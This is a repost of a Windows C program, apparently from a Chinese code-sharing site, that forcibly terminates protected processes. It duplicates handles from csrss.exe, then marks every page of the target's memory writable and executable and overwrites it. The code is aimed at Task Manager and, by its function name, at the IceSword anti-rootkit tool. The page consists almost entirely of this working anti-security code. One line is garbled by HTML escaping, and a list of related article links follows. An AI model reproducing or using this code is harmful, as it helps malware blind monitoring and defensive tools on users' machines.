内核级结束进程c代码
来源:互联网 发布:重复文件查找软件 编辑:程序博客网 时间:2024/06/08 07:11
- #include <windows.h>
- #include <ntsecapi.h>
- #include <aclapi.h>
- #include <tlhelp32.h>
- #pragma comment (lib,"ntdll.lib") // Copy From DDK
- #pragma comment (lib,"Kernel32.lib")
- #pragma comment (lib,"Advapi32.lib")
- #pragma comment(linker, "/ENTRY:main")
- #ifndef ULONG_PTR
- #define ULONG_PTR unsigned long
- #endif
- //------------------ 数据类型声明开始 --------------------//
- typedef struct _PROCESS_BASIC_INFORMATION {
- NTSTATUS ExitStatus;
- ULONG PebBaseAddress;
- ULONG_PTR AffinityMask;
- LONG BasePriority;
- ULONG_PTR UniqueProcessId;
- ULONG_PTR InheritedFromUniqueProcessId;
- } PROCESS_BASIC_INFORMATION;
- typedef PROCESS_BASIC_INFORMATION *PPROCESS_BASIC_INFORMATION;
- typedef struct _SYSTEM_HANDLE_INFORMATION
- {
- ULONG ProcessId;
- UCHAR ObjectTypeNumber;
- UCHAR Flags;
- USHORT Handle;
- PVOID Object;
- ACCESS_MASK GrantedAccess;
- } SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
- typedef struct _SYSTEM_MODULE_INFORMATION {
- ULONG Reserved[2];
- PVOID Base;
- ULONG Size;
- ULONG Flags;
- USHORT Index;
- USHORT Unknown;
- USHORT LoadCount;
- USHORT ModuleNameOffset;
- CHAR ImageName[256];
- } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
- typedef struct _OBJECT_ATTRIBUTES {
- ULONG Length;
- HANDLE RootDirectory;
- PUNICODE_STRING ObjectName;
- ULONG Attributes;
- PVOID SecurityDescriptor;
- PVOID SecurityQualityOfService;
- } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
- typedef enum _SECTION_INHERIT {
- ViewShare = 1,
- ViewUnmap = 2
- } SECTION_INHERIT;
- typedef struct _MY_PROCESS_INFO {
- ULONG PID;
- ULONG KPEB;
- ULONG CR3;
- CHAR Name[16];
- ULONG Reserved;
- } MY_PROCESS_INFO, *PMY_PROCESS_INFO;
- typedef struct _CLIENT_ID {
- HANDLE UniqueProcess;
- HANDLE UniqueThread;
- } CLIENT_ID;
- typedef CLIENT_ID *PCLIENT_ID;
- typedef long NTSTATUS;
- //------------------ 数据类型声明结束 --------------------//
- //--------------------- 预定义开始 -----------------------//
- #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
- #define STATUS_SUCCESS 0x00000000
- #define STATUS_UNSUCCESSFUL 0xC0000001
- #define STATUS_NOT_IMPLEMENTED 0xC0000002
- #define STATUS_INFO_LENGTH_MISMATCH 0xC0000004
- #define STATUS_INVALID_PARAMETER 0xC000000D
- #define STATUS_ACCESS_DENIED 0xC0000022
- #define STATUS_BUFFER_TOO_SMALL 0xC0000023
- #define OBJ_KERNEL_HANDLE 0x00000200
- #define SystemModuleInformation 11
- #define SystemHandleInformation 0x10
- #define InitializeObjectAttributes( p, n, a, r, s ) { (p)->Length = sizeof( OBJECT_ATTRIBUTES );(p)->RootDirectory = r; (p)->Attributes = a; (p)->ObjectName = n; (p)->SecurityDescriptor = s; (p)->SecurityQualityOfService = NULL; }
- //--------------------- 预定义结束 -----------------------//
- //------------------ Native API声明开始 ------------------//
- /*
- NTSYSAPI
- NTSTATUS
- NTAPI
- ZwQuerySystemInformation(
- ULONG SystemInformationClass,
- PVOID SystemInformation,
- ULONG SystemInformationLength,
- PULONG ReturnLength
- );
- */
- typedef NTSTATUS (NTAPI* PNtZwQuerySystemInformation) (ULONG, PVOID, ULONG, PULONG);
- PNtZwQuerySystemInformation ZwQuerySystemInformation;
- /*
- NTSYSAPI
- NTSTATUS
- NTAPI
- ZwOpenProcess(
- OUT PHANDLE ProcessHandle,
- IN ACCESS_MASK AccessMask,
- IN POBJECT_ATTRIBUTES ObjectAttributes,
- IN PCLIENT_ID ClientId );
- */
- typedef NTSTATUS (NTAPI* PNtZwOpenProcess) (OUT PHANDLE, IN ACCESS_MASK, IN POBJECT_ATTRIBUTES,
- IN PCLIENT_ID);
- PNtZwOpenProcess ZwOpenProcess;
- /*
- NTSYSAPI
- NTSTATUS
- NTAPI
- ZwAllocateVirtualMemory(
- IN HANDLE ProcessHandle,
- IN OUT PVOID *BaseAddress,
- IN ULONG ZeroBits,
- IN OUT PULONG RegionSize,
- IN ULONG AllocationType,
- IN ULONG Protect );
- */
- typedef NTSTATUS (NTAPI* PNtZwAllocateVirtualMemory) (IN HANDLE, IN OUT PVOID,
- IN ULONG, IN OUT PULONG,
- IN ULONG, IN ULONG);
- PNtZwAllocateVirtualMemory ZwAllocateVirtualMemory;
- /*
- NTSYSAPI
- NTSTATUS
- NTAPI
- ZwDuplicateObject(
- IN HANDLE SourceProcessHandle,
- IN PHANDLE SourceHandle,
- IN HANDLE TargetProcessHandle,
- OUT PHANDLE TargetHandle,
- IN ACCESS_MASK DesiredAccess OPTIONAL,
- IN BOOLEAN InheritHandle,
- IN ULONG Options );*/
- typedef NTSTATUS (NTAPI* PNtZwDuplicateObject) ( IN HANDLE, IN PHANDLE, IN HANDLE, OUT PHANDLE,
- IN ACCESS_MASK, IN BOOLEAN, IN ULONG);
- PNtZwDuplicateObject ZwDuplicateObject;
- /*
- NTSYSAPI
- NTSTATUS
- NTAPI
- ZwQueryInformationProcess(
- IN HANDLE ProcessHandle,
- IN PVOID ProcessInformationClass,
- OUT PVOID ProcessInformation,
- IN ULONG ProcessInformationLength,
- OUT PULONG ReturnLength );*/
- typedef NTSTATUS(NTAPI* PNtZwQueryInformationProcess)(IN HANDLE, IN PVOID, OUT PVOID, IN ULONG, OUT PULONG );
- PNtZwQueryInformationProcess ZwQueryInformationProcess;
- /*
- NTSYSAPI
- NTSTATUS
- NTAPI
- ZwProtectVirtualMemory(
- IN HANDLE ProcessHandle,
- IN OUT PVOID *BaseAddress,
- IN OUT PULONG NumberOfBytesToProtect,
- IN ULONG NewAccessProtection,
- OUT PULONG OldAccessProtection );*/
- typedef NTSTATUS (NTAPI* PNtZwProtectVirtualMemory) (IN HANDLE, IN OUT PVOID, IN OUT PULONG, IN ULONG , OUT PULONG);
- PNtZwProtectVirtualMemory ZwProtectVirtualMemory;
- /*
- NTSYSAPI
- NTSTATUS
- NTAPI
- ZwWriteVirtualMemory(
- IN HANDLE ProcessHandle,
- IN PVOID BaseAddress,
- IN PVOID Buffer,
- IN ULONG NumberOfBytesToWrite,
- OUT PULONG NumberOfBytesWritten OPTIONAL );
- */
- typedef NTSTATUS (NTAPI *PNtZwWriteVirtualMemory) ( IN HANDLE, IN PVOID, IN PVOID, IN ULONG, OUT PULONG );
- PNtZwWriteVirtualMemory ZwWriteVirtualMemory;
- /*
- NTSYSAPI
- NTSTATUS
- NTAPI
- ZwClose(
- IN HANDLE ObjectHandle );
- */
- typedef NTSTATUS (NTAPI *PNtZwClose) ( IN HANDLE );
- PNtZwClose ZwClose;
- /*
- NTSYSAPI
- NTSTATUS
- NTAPI
- ZwFreeVirtualMemory(
- IN HANDLE ProcessHandle,
- IN PVOID *BaseAddress,
- IN OUT PULONG RegionSize,
- IN ULONG FreeType );
- */
- typedef NTSTATUS (NTAPI *PNtZwFreeVirtualMemory)( IN HANDLE, IN PVOID, IN OUT PULONG, IN ULONG );
- PNtZwFreeVirtualMemory ZwFreeVirtualMemory;
- //------------------ Native API声明结束 ------------------//
- //------------------ 程序正式开始 ------------------//
- DWORD GetPidByName(char *szName)
- {
- HANDLE hProcessSnap = INVALID_HANDLE_VALUE;
- PROCESSENTRY32 pe32={0};
- DWORD dwRet=0;
- hProcessSnap =CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
- if(hProcessSnap == INVALID_HANDLE_VALUE)
- return 0;
- pe32.dwSize = sizeof(PROCESSENTRY32);
- if(Process32First(hProcessSnap, &pe32))
- {
- do
- {
- if(lstrcmpi(szName,pe32.szExeFile)==0)
- {
- dwRet=pe32.th32ProcessID;
- break;
- }
- } while (Process32Next(hProcessSnap,&pe32));
- }
- else return 0;
- if(hProcessSnap !=INVALID_HANDLE_VALUE)
- CloseHandle(hProcessSnap);
- return dwRet;
- }
- void KillIce(ULONG dwProcessId)
- {
- HMODULE hNTDLL = LoadLibrary ("ntdll");
- HANDLE ph, h_dup;
- ULONG bytesIO;
- PVOID buf;
- ULONG i;
- CLIENT_ID cid1;
- OBJECT_ATTRIBUTES attr;
- HANDLE csrss_id;
- PROCESS_BASIC_INFORMATION pbi;
- PVOID p0, p1;
- ULONG sz, oldp;
- ULONG NumOfHandle;
- PSYSTEM_HANDLE_INFORMATION h_info;
- HMODULE hNtDll = ::GetModuleHandle( "ntdll.dll" );
- if( hNtDll == NULL ) return ;
- // 函数 ++
- // ZwQuerySystemInformation
- ZwQuerySystemInformation = (PNtZwQuerySystemInformation)GetProcAddress( hNtDll,
- "ZwQuerySystemInformation" );
- if( ZwQuerySystemInformation == NULL ) return ;
- // ZwOpenProcess
- ZwOpenProcess = (PNtZwOpenProcess)GetProcAddress( hNtDll,
- "ZwOpenProcess" );
- if( ZwOpenProcess == NULL ) return ;
- // ZwAllocateVirtualMemory
- ZwAllocateVirtualMemory = (PNtZwAllocateVirtualMemory)GetProcAddress( hNtDll,
- "ZwAllocateVirtualMemory" );
- if( ZwAllocateVirtualMemory == NULL ) return ;
- // ZwDuplicateObject
- ZwDuplicateObject = (PNtZwDuplicateObject)GetProcAddress( hNtDll,
- "ZwDuplicateObject" );
- if( ZwDuplicateObject == NULL ) return ;
- // ZwQueryInformationProcess
- ZwQueryInformationProcess = (PNtZwQueryInformationProcess)GetProcAddress( hNtDll,
- "ZwQueryInformationProcess" );
- if( ZwQueryInformationProcess == NULL ) return ;
- // ZwProtectVirtualMemory
- ZwProtectVirtualMemory = (PNtZwProtectVirtualMemory)GetProcAddress( hNtDll,
- "ZwProtectVirtualMemory" );
- if( ZwProtectVirtualMemory == NULL ) return ;
- // ZwWriteVirtualMemory
- ZwWriteVirtualMemory = (PNtZwWriteVirtualMemory)GetProcAddress( hNtDll,
- "ZwWriteVirtualMemory" );
- if( ZwWriteVirtualMemory == NULL ) return ;
- // ZwClose
- ZwClose = (PNtZwClose)GetProcAddress( hNtDll,
- "ZwClose" );
- if( ZwClose == NULL ) return ;
- // ZwFreeVirtualMemory
- ZwFreeVirtualMemory = (PNtZwFreeVirtualMemory)GetProcAddress( hNtDll,
- "ZwFreeVirtualMemory" );
- if( ZwFreeVirtualMemory == NULL ) return ;
- // 函数 --
- csrss_id = (HANDLE)GetPidByName("csrss.exe");
- attr.Length = sizeof(OBJECT_ATTRIBUTES);
- attr.RootDirectory = 0;
- attr.ObjectName = 0;
- attr.Attributes = 0;
- attr.SecurityDescriptor = 0;
- attr.SecurityQualityOfService = 0;
- cid1.UniqueProcess = csrss_id;
- cid1.UniqueThread = 0;
- ZwOpenProcess(&ph, PROCESS_ALL_ACCESS, &attr, &cid1);
- bytesIO = 0x400000;
- buf = 0;
- ZwAllocateVirtualMemory(GetCurrentProcess(), &buf, 0, &bytesIO, MEM_COMMIT, PAGE_READWRITE);
- ZwQuerySystemInformation(SystemHandleInformation, buf, 0x400000, &bytesIO);
- NumOfHandle = (ULONG)buf;
- h_info = ( PSYSTEM_HANDLE_INFORMATION )((ULONG)buf+4);
- for (i= 0 ; i<numofhandle; i++)="" {="" if="" ((h_info-="">ProcessId == (ULONG)csrss_id)&&(h_info->ObjectTypeNumber == 5))
- {
- if (ZwDuplicateObject(ph, (PHANDLE)h_info->Handle, (HANDLE)-1, &h_dup,
- 0, 0, DUPLICATE_SAME_ACCESS) == STATUS_SUCCESS)
- ZwQueryInformationProcess(h_dup, 0, &pbi, sizeof(pbi), &bytesIO);
- if (pbi.UniqueProcessId == dwProcessId)
- {
- MessageBox(0, "目标已确定!", "OK", MB_OK);
- for (i = 0x1000; i<0x80000000; i = i + 0x1000)
- {
- p0 = (PVOID)i;
- p1 = p0;
- sz = 0x1000;
- if (ZwProtectVirtualMemory(h_dup, &p1, &sz, PAGE_EXECUTE_READWRITE, &oldp) == STATUS_SUCCESS)
- {
- ZwWriteVirtualMemory(h_dup, p0, buf, 0x1000, &oldp);
- }
- }
- MessageBox(0, "任务已完成!","OK", 0);
- ZwClose(h_dup);
- }
- }
- }
- bytesIO = 0;
- ZwFreeVirtualMemory(GetCurrentProcess(), &buf, &bytesIO, MEM_RELEASE);
- FreeLibrary(hNTDLL);
- }
- BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable)
- {
- TOKEN_PRIVILEGES tp;
- tp.PrivilegeCount = 1;
- LookupPrivilegeValue(NULL,szPrivName,&tp.Privileges[0].Luid);
- tp.Privileges[0].Attributes = fEnable ? SE_PRIVILEGE_ENABLED:0;
- AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(tp),NULL,NULL);
- return((GetLastError() == ERROR_SUCCESS));
- }
- void main()
- {
- ULONG Pid;
- HANDLE hToken;
- OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken);
- EnablePrivilege(hToken,SE_DEBUG_NAME,TRUE);
- if (Pid = GetPidByName("taskmgr.exe"))
- {
- KillIce(Pid);
- }
- ExitProcess(0);
- }</numofhandle;></tlhelp32.h></aclapi.h></ntsecapi.h></windows.h>
http://read.pudn.com/downloads122/sourcecode/windows/system/519804/KillProcess.cpp__.htm
- 内核级结束进程c代码
- 内核级强制结束进程
- 结束进程(C#)
- c/c++ 结束进程
- VB结束进程的代码
- Linux0.11内核--进程的结束
- Linux0.11内核--进程的结束
- 通过命令行控制窗口置顶和结束指定进程工具c代码
- VBS命令-进程操作代码(检测进程, 结束进程)
- 结束杀掉其他进程的代码
- [C#]结束Excel的进程的方法
- [C#]结束Excel的进程的方法
- [C#]结束Excel的进程的方法
- c/c++ 结束进程的方法
- linux c 等待所有子进程结束
- VB 获取进程/模块信息 批量结束进程的代码
- C#-访问轰炸机,新建进程,结束进程...(ConsoleApp)---ShinePans
- 结束进程
- 关于消息虚码的了解
- 可以让你少奋斗十年的工作经验
- Windows程序设计——终止进程运行
- 在VC中如何结束进程和启动新进程?
- 如何做到只允许一个实例运行?
- 内核级结束进程c代码
- C++强杀进程,可结束IceSword
- ads常见错误汇总
- LINQ to XML
- 如何禁止用户通过任务管理器终止进程的一种方法(Win2000/xp)
- VC++中进程与多进程管理的方法
- Visual C++进程间数据通信的实现
- VC查看系统进程ID,终止进程的程序源码
- 发送模拟按键&&由进程名结束进程